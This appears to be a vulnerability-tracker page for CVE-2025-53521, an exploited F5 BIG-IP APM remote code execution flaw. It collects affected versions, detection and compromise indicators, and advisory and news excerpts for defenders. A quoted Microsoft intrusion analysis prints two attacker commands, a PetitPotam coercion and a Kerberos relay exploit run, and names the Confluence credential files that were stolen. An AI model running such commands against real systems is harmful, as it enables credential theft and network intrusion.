CVE-2025-53521
published 2025-10-15CVE-2025-53521: When a BIG-IP APM access policy is configured on a virtual server, specific malicious traffic can lead to Remote Code Execution (RCE). Note: Software versions…
PriorityP192critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITW
CISA Known Exploited Vulnerabilitydue 2026-03-30
Exploited in the wild
EPSS
2.21%
80.8th percentile
When a BIG-IP APM access policy is configured on a virtual server, specific malicious traffic can lead to Remote Code Execution (RCE).
Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| f5 | big-ip | >= 15.1.0 < 15.1.10.8 | 15.1.10.8 |
| f5 | big-ip | >= 16.1.0 < 16.1.6.1 | 16.1.6.1 |
| f5 | big-ip | >= 17.1.0 < 17.1.3 | 17.1.3 |
| f5 | big-ip | >= 17.5.0 < 17.5.1.3 | 17.5.1.3 |
| f5 | big-ip_access_policy_manager | >= 15.1.0 < 15.1.10.8 | 15.1.10.8 |
| f5 | big-ip_access_policy_manager | >= 16.1.0 < 16.1.6.1 | 16.1.6.1 |
| f5 | big-ip_access_policy_manager | >= 17.1.0 < 17.1.3 | 17.1.3 |
| f5 | big-ip_access_policy_manager | >= 17.5.0 < 17.5.1.3 | 17.5.1.3 |
| f5 | big-ip_apm | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Check for presence of anomalous named pipe/socket files /run/bigtlog.pipe and /run/bigstart.ltm on BIG-IP APM systems as indicators of compromise. ↗
- →Verify file hashes, sizes, and timestamps of /usr/bin/umount and /usr/sbin/httpd against known-good baselines; mismatches indicate tampering. ↗
- →Monitor /var/log/restjavad-audit..log for entries showing a local user accessing the iControl REST API from localhost, which is anomalous and indicative of post-exploitation activity. ↗
- →Monitor /var/log/auditd/audit.log for entries showing a local user accessing the iControl REST API from localhost to disable SELinux. ↗
- →Review /var/log/audit for command execution results logged in the audit log as evidence of attacker hands-on-keyboard activity. ↗
- →Run sys-eicheck (system integrity checker) and flag failures specifically against /usr/bin/umount and /usr/sbin/httpd as indicators of unexpected system software modification. ↗
- →Detect attacker C2/exfiltration disguise by hunting for outbound HTTP/S traffic from BIG-IP systems returning HTTP 201 response codes with a CSS content-type header. ↗
- →Webshells observed at .php3 paths under /var/sam/www/webtop/renderer/ may operate in memory only; the files may not be modified on disk, so memory forensics is required in addition to file-based checks. ↗
- →Alert on scanning/reconnaissance activity targeting the F5 BIG-IP REST API endpoint /mgmt/shared/identified-devices/config/device-info, which is being actively probed to fingerprint vulnerable devices. ↗
- →Do not trust UCS backup files for restoration if the compromise time is unknown; UCS files from compromised systems can contain persistent malware. ↗
- ·The vulnerability is only exploitable when a BIG-IP APM access policy is configured on a virtual server; systems without this configuration are not affected. ↗
- ·Each BIG-IP release and EHF may have different file sizes and timestamps for the monitored binaries, so baseline comparisons must be version-specific. ↗
- ·Webshells have been observed operating in memory only; on-disk files at the known webshell paths may not be modified, requiring memory-based detection approaches. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
cisa9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-j3cp-7wh4-9f6c: When a BIG-IP APM Access Policy is configured on a virtual server, undisclosed traffic can cause TMM to terminate
ghsa_unreviewed·2025-10-15
CVE-2025-53521 [HIGH] CWE-121 GHSA-j3cp-7wh4-9f6c: When a BIG-IP APM Access Policy is configured on a virtual server, undisclosed traffic can cause TMM to terminate
When a BIG-IP APM Access Policy is configured on a virtual server, undisclosed traffic can cause TMM to terminate.
Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
VulnCheck
F5 BIG-IP Stack-Based Buffer Overflow Vulnerability
vulncheck·2025·CVSS 9.3
CVE-2025-53521 [CRITICAL] CWE-121 F5 BIG-IP Stack-Based Buffer Overflow Vulnerability
F5 BIG-IP Stack-Based Buffer Overflow Vulnerability
F5 BIG-IP APM contains a stack-based buffer overflow vulnerability that could allow a threat actor to achieve remote code execution.
Affected: F5 BIG-IP
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://my.f5.com/manage/s/article/K000156741; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2026-03-30
CISA
F5 BIG-IP Stack-Based Buffer Overflow Vulnerability
cisa·2026-03-27·CVSS 9.3
CVE-2025-53521 [CRITICAL] CWE-121 F5 BIG-IP Stack-Based Buffer Overflow Vulnerability
Vulnerability: F5 BIG-IP Stack-Based Buffer Overflow Vulnerability
Affected: F5 BIG-IP
F5 BIG-IP APM contains a stack-based buffer overflow vulnerability that could allow a threat actor to achieve remote code execution.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: Please adhere to F5’s guidelines to assess exposure and mitigate risks. Check for signs of potential compromise on all internet accessible F5 products affected by this vulnerability. For more information please see: https://my.f5.com/manage/s/article/K000156741 ; https://my.f5.com/manage/s/article/K000160486 ; https://my.f5.com/manage/s/article/K11438344 ; https://nvd.nist.gov/vuln/de
F5
CVE-2025-53521: When a BIG-IP APM access policy is configured on a virtual server, specific malicious traffic can lead to Remote Code...
vendor_f5·2025-10-15·CVSS 9.8
CVE-2025-53521 [CRITICAL] CWE-121 CVE-2025-53521: When a BIG-IP APM access policy is configured on a virtual server, specific malicious traffic can lead to Remote Code...
CVE-2025-53521: When a BIG-IP APM access policy is configured on a virtual server, specific malicious traffic can lead to Remote Code...
When a BIG-IP APM access policy is configured on a virtual server, specific malicious traffic can lead to Remote Code Execution (RCE).
Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Affected Products: BIG-IP APM
Affected Versions: 15.1.0 - 15.1.10.8; 16.1.0 - 16.1.6.1; 17.1.0 - 17.1.3; 17.5.0 - 17.5.1.3
F5 Advisory Articles: K000156741
F5 References: https://my.f5.com/manage/s/article/K000156741
No detection rules found.
No public exploits indexed.
NCSC
Vulnerability affecting F5 BIG-IP APM
ncsc·2026-03-30·CVSS 9.3
CVE-2025-53521 [CRITICAL] Vulnerability affecting F5 BIG-IP APM
News Download & print article PDF Download & print article PDF
## Vulnerability affecting F5 BIG-IP APM
Organisations have been encouraged to take action against a vulnerability affecting F5 BIG-IP Access Policy Manager.
The NCSC is encouraging UK organisations to take immediate action to mitigate an unauthenticated remote code execution vulnerability affecting F5 BIG-IP Access Policy Manager (CVE-2025-53521). F5 BIG-IP APM is a common component, especially within large enterprises.
## What has happened?
F5 has published an updated security advisory explaining that a previously disclosed vulnerability in BIG-IP APM has been recategorised as an unauthenticated remote code execution vulnerability
CVE-2025-53521: When a BIG-IP APM access policy is configured on a virtual server, specifi
Microsoft
From edge appliance to enterprise compromise: Multi-stage Linux intrusion via F5 and Confluence
blogs_microsoft·2026-05-22·CVSS 8.8
CVE-2025-33073 [HIGH] From edge appliance to enterprise compromise: Multi-stage Linux intrusion via F5 and Confluence
After compromising the Confluence server, the threat actor obtained credentials and used them to attempt authentication against Windows infrastructure from the following files:
/opt/atlassian/confluence/conf/server.xml
/var/atlassian/application-data/confluence/confluence.cfg.xml
This was followed by Kerberos relay attacks and exploitation of CVE-2025-33073, highlighting the risk of credential theft from internal web applications and the importance of monitoring cross-system authentication events.
nxc smb [REDACTED_IP] -d [REDACTED_DOMAIN].com -u Jiraservices -p '********* -M coerce_plus -o M=PetitPotam L="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"
python3 CVE-2025-33073.py -u [REDACTED_DOMAIN].com\Jiraservices -p ******** --attacker-ip [REDACTED_IP] --dns-ip [REDACTED_IP]
Checkpoint
6th April – Threat Intelligence Report
blogs_checkpoint·2026-04-06
CVE-2026-20093 6th April – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 6th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 30th March, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
The European Commission, the European Union’s executive body, has confirmed a data breach after its Europa.eu platform was compromised through a third-party exchange linked to the Trivy supply chain attack. The incident affected at least one Amazon Web Services account and resulted in data theft, while websites and internal sys
Bleepingcomputer
Over 14,000 F5 BIG-IP APM instances still exposed to RCE attacks
blogs_bleepingcomputer·2026-04-02·CVSS 9.3
[CRITICAL] Over 14,000 F5 BIG-IP APM instances still exposed to RCE attacks
## Over 14,000 F5 BIG-IP APM instances still exposed to RCE attacks
## Sergiu Gatlan
Internet threat-monitoring non-profit Shadowserver has found over 14,000 BIG-IP APM instances exposed online amid ongoing attacks exploiting a critical-severity remote code execution (RCE) vulnerability.
BIG-IP APM (short for Access Policy Manager) is F5's centralized access management proxy solution designed to help admins secure access to their organizations' networks, cloud, applications, and application programming interfaces (APIs).
This 5-month-old flaw (tracked as CVE-2025-53521 ) was disclosed in October as a denial-of-service (DoS) vulnerability and was reclassified as an RCE bug over the weekend.
"Due to new information obtained in March 2026, the original vulnerability is being re-categoriz
Bleepingcomputer
Hackers exploiting critical F5 BIG-IP flaw in attacks, patch now
blogs_bleepingcomputer·2026-03-30·CVSS 9.3
[CRITICAL] Hackers exploiting critical F5 BIG-IP flaw in attacks, patch now
## Hackers exploiting critical F5 BIG-IP flaw in attacks, patch now
## Sergiu Gatlan
Cybersecurity firm F5 Networks has reclassified a BIG-IP APM denial-of-service (DoS) vulnerability as a critical-severity remote code execution (RCE) flaw, warning that attackers are exploiting it to deploy webshells on unpatched devices.
BIG-IP APM (short for Access Policy Manager) is a centralized access management proxy solution that enables admins to secure and manage user access to their organizations' networks, cloud, applications, and application programming interfaces (APIs).
Tracked CVE-2025-53521 , this security flaw can be exploited by attackers without privileges to perform remote code execution when targeting BIG-IP APM systems with access policies configured on a virtual server.
In addi
Hackernews
CISA Adds CVE-2025-53521 to KEV After Active F5 BIG-IP APM Exploitation
blogs_hackernews·2026-03-28·CVSS 9.3
CVE-2025-53521 [CRITICAL] CISA Adds CVE-2025-53521 to KEV After Active F5 BIG-IP APM Exploitation
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## CISA Adds CVE-2025-53521 to KEV After Active F5 BIG-IP APM Exploitation
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a critical security flaw impacting F5 BIG-IP Access Policy Manager (APM) to its Known Exploited Vulnerabilities ( KEV ) catalog, citing evidence of active exploitation.
The vulnerability in question is CVE-2025-53521 (CVSS v4 score: 9.3), which could allow a threat actor to achieve remote code execution.
"When a BIG-IP APM access policy is configured on a virtual server, specific malicious traffic can lead to Remote Code Execution (RCE)," according to a description of the f
Qualys
A Strategic Response to the F5 BIG-IP Nation-State Breach 2025
blogs_qualys·2025-10-18
A Strategic Response to the F5 BIG-IP Nation-State Breach 2025
## Table of Contents
CISAs KEV Inclusion Underscores the Severity of the F5 BIG-IP Breach
The Risk-Velocity Mismatch: F5 Patching Decelerates as Attacker Insight Accelerates
How Qualys Helps You Discover F5 Assets and Detect Related Vulnerabilities
Conclusion
In mid-October 2025, the cybersecurity landscape was dealt a severe blow. F5 disclosed a long-term, sophisticated breach by a nation-state threat actor. This incident exposed critical F5 BIG-IP vulnerabilities and triggered heightened scrutiny across enterprise edge infrastructure.
This was not a typical vulnerability disclosure. The attackers exfiltrated a strategic critical pair of assets: portions of BIG-IP source code, and internal details of undisclosed (unpatched) vulnerabilities.
## CISA’s KEV Inclusion Underscores the S
Qualys
F5 BIG-IP Vulnerabilities: Strategic Breach Response with Qualys | Qualys
blogs_qualys·2025-10-18
F5 BIG-IP Vulnerabilities: Strategic Breach Response with Qualys | Qualys
#### Table of Contents
- CISAs KEV Inclusion Underscores the Severity of the F5 BIG-IP Breach
- The Risk-Velocity Mismatch: F5 Patching Decelerates as Attacker Insight Accelerates
- How Qualys Helps You Discover F5 Assets and Detect Related Vulnerabilities
- Conclusion
In mid-October 2025, the cybersecurity landscape was dealt a severe blow. F5 disclosed a long-term, sophisticated breach by a nation-state threat actor. This incident exposed critical F5 BIG-IP vulnerabilities and triggered heightened scrutiny across enterprise edge infrastructure.
This was not a typical vulnerability disclosure. The attackers exfiltrated a strategic critical pair of assets: portions of BIG-IP source code, and internal details of undisclosed (unpatched) vulnerabilities.
## CISA’s KEV Inclusion Underscore
Tenable
FAQ on F5 Security Incident
blogs_tenable·2025-10-15
FAQ on F5 Security Incident
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
2025-10-15
Published
2026-03-27
Added to CISA KEV
Exploited in the wild